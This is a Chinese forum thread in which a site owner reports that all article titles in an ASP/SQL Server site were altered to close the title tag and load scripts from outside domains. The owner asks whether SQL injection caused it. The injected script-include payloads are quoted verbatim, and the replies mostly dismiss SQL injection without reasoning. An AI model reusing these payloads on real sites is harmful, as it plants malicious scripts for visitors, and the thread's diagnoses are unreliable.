日期:2014-05-18  浏览次数:20639 次

这种情况是 SQL 注入吗?
网站:

windows 2003 + ASP + Sql2000

所有文章的标题,被加上了 后缀,比如:

今年情人节出怪招 不走浪漫走传统 ,变成:

今年情人节出怪招 不走浪漫走传统 </title><script src=http://nikjju.com/r.php ></script>

野外露头保护措施,变成

野外露头保护措施 </title><script src=http://statsmy.com/ur.php ></script>


这种情况,是 SQL注入的还是 IIS 或 操作系统漏洞 造成的?

------解决方案--------------------
带有了格式化的文字内容,这个不是注入是病毒
------解决方案--------------------
这个是不是保存内容的时候就已经加了这些标签来的.
不是SQL注入.建议去看下注入.
------解决方案--------------------
我认为有可能哦,关键还是要查看下你系统的源代码,会不会产生后面的字符串
------解决方案--------------------


你这个不是SQL注入
------解决方案--------------------
你这个不是SQL注入
------解决方案--------------------
不是的!!
------解决方案--------------------
这应该是IIS漏洞导致的网站被挂带有木马的网页